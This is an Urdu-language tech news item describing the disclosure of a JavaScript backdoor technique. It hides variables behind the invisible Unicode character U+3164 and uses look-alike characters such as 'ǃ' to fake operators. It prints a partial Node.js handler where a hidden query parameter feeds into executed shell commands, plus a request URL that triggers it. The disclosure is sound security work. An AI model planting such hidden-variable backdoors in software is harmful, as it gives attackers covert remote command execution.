دو طرفہ متن کے ڈسپلے آرڈر کو تبدیل کرنے والے یونیکوڈ حروف کے استعمال پر مبنی ٹروجن سورس حملے کے طریقہ کار کے بعد، پوشیدہ اعمال کو متعارف کرانے کے لیے ایک اور تکنیک شائع کی گئی ہے، جو جاوا اسکرپٹ کوڈ پر لاگو ہوتی ہے۔ نیا طریقہ یونیکوڈ کریکٹر "ㅤ" (کوڈ 0x3164، "HANGUL FILLER") کے استعمال پر مبنی ہے، جو ایک حرف ہے لیکن اس میں کوئی مرئی مواد نہیں ہے۔ یونیکوڈ زمرہ جس سے یہ کریکٹر تعلق رکھتا ہے اسے جاوا اسکرپٹ متغیر ناموں میں استعمال کرنے کے لیے ECMAScript 2015 کی وضاحت کے بعد سے اجازت دی گئی ہے، جس سے مقبول کوڈ ایڈیٹرز جیسے Notepad++ اور VS Code میں غیر مرئی متغیرات یا نئے متغیرات کی تخلیق ممکن ہوتی ہے۔
مثال کے طور پر، Node.js پلیٹ فارم کا کوڈ دیا گیا ہے، جس میں، ایک واحد حرف "ㅤ" پر مشتمل متغیر کا استعمال کرتے ہوئے، ایک بیک ڈور چھپا ہوا ہے جو آپ کو حملہ آور کے بتائے ہوئے کوڈ پر عمل کرنے کی اجازت دیتا ہے: app.get( '/network_health', async (req, res) = > { const { timeout,ㅤ} = req.query; // دراصل کہتا ہے "const { timeout,ㅤ \u3164}" const checkCommands = [ 'ping -c 1 google۔ com', 'curl -s http:// example.com/',ㅤ // کوما کے بعد \u3164 ]؛
پہلی نظر میں، صرف ٹائم آؤٹ ویلیو کو بیرونی پیرامیٹر سے گزارا جاتا ہے، اور جو کمانڈز پر عمل درآمد کیا جاتا ہے اس میں ایک بے ضرر فکسڈ لسٹ ہوتی ہے۔ لیکن درحقیقت، ٹائم آؤٹ متغیر کے بعد، علامت کوڈ \u3164 کے ساتھ ایک اور غیر مرئی متغیر کی قدر تفویض کی جاتی ہے، جسے قابل عمل کمانڈز کی صف میں بھی بدل دیا جاتا ہے۔ اس طرح، اس طرح کے ڈھانچے کی موجودگی میں، حملہ آور بیک ڈور کو چالو کرنے اور اپنے کوڈ پر عمل درآمد کرنے کے لیے "https://host:8080/network_health?%E3%85%A4=command" جیسی درخواست بھیج سکتا ہے۔
ایک اور مثال کے طور پر، حروف "ǃ" (ALVEOLAR CLICK) دیا گیا ہے، جسے ایک فجائیہ نقطہ کی نشاندہی کرنے کے لیے استعمال کیا جا سکتا ہے۔ مثال کے طور پر، اظہار "if(environmentǃ=ENV_PROD){" جب Node.js 14 میں عمل میں لایا جائے گا تو ہمیشہ درست ہوگا، کیونکہ یہ اختلافات کی جانچ نہیں کرتا، لیکن متغیر "environmentǃ" کو ENV_PROD پر سیٹ کرتا ہے۔ گمراہ کن یونی کوڈ حروف میں "/"، "−" "+"، "⩵" "❨" "⫽" "꓿" اور "∗" شامل ہیں۔
ماخذ: opennet.ru